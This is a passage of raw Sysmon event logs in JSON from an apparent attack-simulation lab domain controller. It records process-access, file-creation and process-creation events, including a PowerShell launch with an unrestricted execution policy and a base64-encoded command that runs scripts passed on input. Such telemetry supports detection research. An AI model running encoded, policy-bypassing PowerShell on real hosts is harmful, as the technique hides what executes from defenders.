06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.510\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.510","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.526\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.526","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.526\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nProcessId: 4660\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rpyyzyjo.e5l.ps1\r\nCreationUtcTime: 2020-08-01 06:55:20.526","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.526","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rpyyzyjo.e5l.ps1","CreationUtcTime":"2020-08-01 06:55:20.526","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.557\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.557","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.557\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.557","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.628\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-00102A9C0800}\r\nProcessId: 3700\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nParentProcessId: 4660\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.628","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-00102A9C0800}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 